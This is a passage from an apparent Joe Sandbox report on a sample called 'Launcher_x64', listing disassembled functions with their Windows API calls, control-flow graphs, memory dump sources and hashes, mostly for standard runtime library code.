                                                                                                                                                                                                                                                                                        • API ID: _strcspn
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: c360125d38494724fadd780d9f32c0c235736ac8601505d4fc78935594ef1493
                                                                                                                                                                                                                                                                                        • Instruction ID: e8326018d1d9473a0fd6fdf1c772b1e66621cf0ea287dfa24a9357d628c3a0ff
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c360125d38494724fadd780d9f32c0c235736ac8601505d4fc78935594ef1493
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA32C4B49052698FDB14DF64C981B9DFBF1BF48300F0585AAE88DA7351D730AA85CFA1
                                                                                                                                                                                                                                                                                        Function 00D01730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConsoleFreeProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 621788221-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 8e647d5daf176f1f0c941a4d56e39aef4e744eb72f3e4571ea37906854ecbc1d
                                                                                                                                                                                                                                                                                        • Instruction ID: 92f61f758575f4dbed5797636f61cbaa2a22749ac0a42adce806a1c49c230d7b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e647d5daf176f1f0c941a4d56e39aef4e744eb72f3e4571ea37906854ecbc1d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC41B0B4D053089FCB04DFA9D98579EBBF0EF48314F108429E858AB391D775A984CFA5
                                                                                                                                                                                                                                                                                        Function 00D1CAD7 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00D1C9E4,?,00D1CB99,00000000,?,?,00D1C9E4,E7FA7683,?,00D1C9E4), ref: 00D1CAE8
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00D1CB99,00000000,?,?,00D1C9E4,E7FA7683,?,00D1C9E4), ref: 00D1CAEF
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00D1CB01
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 02a730f9504c5c1dbd98931af6681a6e377ac30185bf3cb26fa3c31bdd4a0bec
                                                                                                                                                                                                                                                                                        • Instruction ID: 950b21975b3fc26656800bc4cce08d66eb41cd792cff62c817b24e8c6ef3491f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a730f9504c5c1dbd98931af6681a6e377ac30185bf3cb26fa3c31bdd4a0bec
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5D09231050208BBCF02AF61FC0D9CD3F6AEF40381B146051B9499A271DF71A9D2DEB0
                                                                                                                                                                                                                                                                                        Function 00D050C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D050DB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1277A: _Yarn.LIBCPMT ref: 00D1279A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1277A: _Yarn.LIBCPMT ref: 00D127BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Yarn$LockitLockit::_std::_
                                                                                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                                                                                        • API String ID: 360232963-1405518554
                                                                                                                                                                                                                                                                                        • Opcode ID: 33ddc22013f876107671c2f3f33aa3810f319e66a88ebd63cc554723de629ed6
                                                                                                                                                                                                                                                                                        • Instruction ID: c6f54cd598f3987fad9d5d85a784fbce16b7da38f2389502025b208a63028ed5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33ddc22013f876107671c2f3f33aa3810f319e66a88ebd63cc554723de629ed6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1601DE70905608ABCB08FFF8D4957AE7BB1EF44308F44446DE94657386DA309A90DF7A
                                                                                                                                                                                                                                                                                        Function 00D2AD2D Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 243 d2ad2d-d2ad4f 244 d2af42 243->244 245 d2ad55-d2ad57 243->245 248 d2af44-d2af48 244->248 246 d2ad83-d2ada6 245->246 247 d2ad59-d2ad78 call d1f3f8 245->247 250 d2ada8-d2adaa 246->250 251 d2adac-d2adb2 246->251 254 d2ad7b-d2ad7e 247->254 250->251 253 d2adb4-d2adc5 250->253 251->247 251->253 255 d2adc7-d2add5 call d29add 253->255 256 d2add8-d2ade8 call d2b05a 253->256 254->248 255->256 261 d2ae31-d2ae43 256->261 262 d2adea-d2adf0 256->262 265 d2ae45-d2ae4b 261->265 266 d2ae9a-d2aeba WriteFile 261->266 263 d2adf2-d2adf5 262->263 264 d2ae19-d2ae2f call d2b0d7 262->264 267 d2ae00-d2ae0f call d2b49e 263->267 268 d2adf7-d2adfa 263->268 286 d2ae12-d2ae14 264->286 272 d2ae86-d2ae93 call d2b506 265->272 273 d2ae4d-d2ae50 265->273 270 d2aec5 266->270 271 d2aebc-d2aec2 GetLastError 266->271 267->286 268->267 276 d2aeda-d2aedd 268->276 280 d2aec8-d2aed3 270->280 271->270 285 d2ae98 272->285 274 d2ae72-d2ae84 call d2b6ca 273->274 275 d2ae52-d2ae55 273->275 293 d2ae6d-d2ae70 274->293 281 d2aee0-d2aee2 275->281 282 d2ae5b-d2ae68 call d2b5e1 275->282 276->281 287 d2aed5-d2aed8 280->287 288 d2af3d-d2af40 280->288 289 d2af10-d2af1c 281->289 290 d2aee4-d2aee9 281->290 282->293 285->293 286->280 287->276 288->248 296 d2af26-d2af38 289->296 297 d2af1e-d2af24 289->297 294 d2af02-d2af0b call d1ebf0 290->294 295 d2aeeb-d2aefd 290->295 293->286 294->254 295->254 296->254 297->244 297->296
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D2B0D7: GetConsoleOutputCP.KERNEL32(E7FA7683,00000000,00000000,?), ref: 00D2B13A
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D1A691,?,00D1A8F3), ref: 00D2AEB2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D1A691,?,00D1A8F3,?,00D1A8F3,?,?,?,?,?,?,?,?,?,?), ref: 00D2AEBC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a975249cdef84af3a0f91c9a50caac692ed0591a7b54ab4483e45030df60da2
                                                                                                                                                                                                                                                                                        • Instruction ID: 8a059ef4811bee2dc380dae24473106bfbb5875495d7735a17cbf1c9e6245ffd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a975249cdef84af3a0f91c9a50caac692ed0591a7b54ab4483e45030df60da2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC61B4B1900229AFDF01CFACE944AAEBBB9EF69308F190145F914A7251D375D902CB71
                                                                                                                                                                                                                                                                                        Function 00D2B506 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 300 d2b506-d2b55b call d16c90 303 d2b5d0-d2b5e0 call d12303 300->303 304 d2b55d 300->304 305 d2b563 304->305 307 d2b569-d2b56b 305->307 309 d2b585-d2b5aa WriteFile 307->309 310 d2b56d-d2b572 307->310 313 d2b5c8-d2b5ce GetLastError 309->313 314 d2b5ac-d2b5b7 309->314 311 d2b574-d2b57a 310->311 312 d2b57b-d2b583 310->312 311->312 312->307 312->309 313->303 314->303 315 d2b5b9-d2b5c4 314->315 315->305 316 d2b5c6 315->316 316->303
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D2AE98,?,00D1A8F3,?,?,?,00000000), ref: 00D2B5A2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D2AE98,?,00D1A8F3,?,?,?,00000000,?,?,?,?,?,00D1A691,?,00D1A8F3), ref: 00D2B5C8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 33734a437fae5f7e249bbbdb70e83cba3547175b2f1359f27833b839f01078ae
                                                                                                                                                                                                                                                                                        • Instruction ID: 4bb2d4d03482364b56ced640b6c2d44d10a505c4556548e4e74866ef560bc52e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33734a437fae5f7e249bbbdb70e83cba3547175b2f1359f27833b839f01078ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1215E35A002299BCB19CF19E8809E9B7FAEF59315F1441AAE946DB211D770ED42CF70
                                                                                                                                                                                                                                                                                        Function 00D048C0 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D048DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::_Lockit.LIBCPMT ref: 00D04DBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00D04DE9
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D049AB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c445017e5aa2fa141ae08bcaf0acbb7708f429434c32407b6aeca698324bba11
                                                                                                                                                                                                                                                                                        • Instruction ID: cd63ae72e34870ec960ef852f1a7422e885a49bd42318ed96ba58401c540e7a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c445017e5aa2fa141ae08bcaf0acbb7708f429434c32407b6aeca698324bba11
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D319BB4D04209DFCB04EFA4E595AEEBBF0FF04304F104569E955A7391DA34AA54CFA1
                                                                                                                                                                                                                                                                                        Function 00D24C19 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 347 d24c19-d24c1e 348 d24c20-d24c38 347->348 349 d24c46-d24c4f 348->349 350 d24c3a-d24c3e 348->350 352 d24c61 349->352 353 d24c51-d24c54 349->353 350->349 351 d24c40-d24c44 350->351 355 d24cbb-d24cbf 351->355 354 d24c63-d24c70 GetStdHandle 352->354 356 d24c56-d24c5b 353->356 357 d24c5d-d24c5f 353->357 358 d24c72-d24c74 354->358 359 d24c9d-d24caf 354->359 355->348 360 d24cc5-d24cc8 355->360 356->354 357->354 358->359 361 d24c76-d24c7f GetFileType 358->361 359->355 362 d24cb1-d24cb4 359->362 361->359 363 d24c81-d24c8a 361->363 362->355 364 d24c92-d24c95 363->364 365 d24c8c-d24c90 363->365 364->355 366 d24c97-d24c9b 364->366 365->355 366->355
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00D24B08,00D3EBC0), ref: 00D24C65
                                                                                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00D24B08,00D3EBC0), ref: 00D24C77
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a38d6dd5eb275fc368f4c888dd7bc1af01b22e37437c106495939c99a5c6d6d8
                                                                                                                                                                                                                                                                                        • Instruction ID: d70a8dc6d52443ec7432790cbe7e9f8a5b020c4f9b86593e586ab22f8a5dd872
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a38d6dd5eb275fc368f4c888dd7bc1af01b22e37437c106495939c99a5c6d6d8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F511E73110576146C7304F3EACC8521BA94A7A2338B3C0719D8F6D66F5C630D882F660
                                                                                                                                                                                                                                                                                        Function 00D1277A Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 367 d1277a-d127a4 call d20cd7 call d127e0 372 d127b0-d127c5 call d127e0 367->372 373 d127a6-d127a9 call d20cd7 367->373 376 d127ae-d127af 373->376 376->372
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Yarn
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1767336200-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b4db805de63351a07ad152f4935d1137d9e90d9ae9659bebb0e307af6aee2178
                                                                                                                                                                                                                                                                                        • Instruction ID: 7787f5ccb25c7844a6f33bec293bb58c70bef30a4f6df143b0535961654b1cee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4db805de63351a07ad152f4935d1137d9e90d9ae9659bebb0e307af6aee2178
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CE0E5723482147BEB196666BC52BB737D8DB407A1F14012DF90AD65C1ED11AC44C575
                                                                                                                                                                                                                                                                                        Function 00D01BA0 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00D01BC8
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 00D01BE8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D01890: CreateFileA.KERNELBASE ref: 00D01913
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileModule$CreateHandleName
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2828212432-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f67d2547a7daab5b9d19157966755300965e35e72c16019d8270623c7f04130d
                                                                                                                                                                                                                                                                                        • Instruction ID: 391316f2006cf5ab3666d58f4a5a0757fe15a240c3cd76d0c7d937036c4f2395
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f67d2547a7daab5b9d19157966755300965e35e72c16019d8270623c7f04130d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80F0F9B19042089FC744EF78E8453ADBBF4EB14300F4185ADD4C9D3340EA746A988F92
                                                                                                                                                                                                                                                                                        Function 00D23187 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

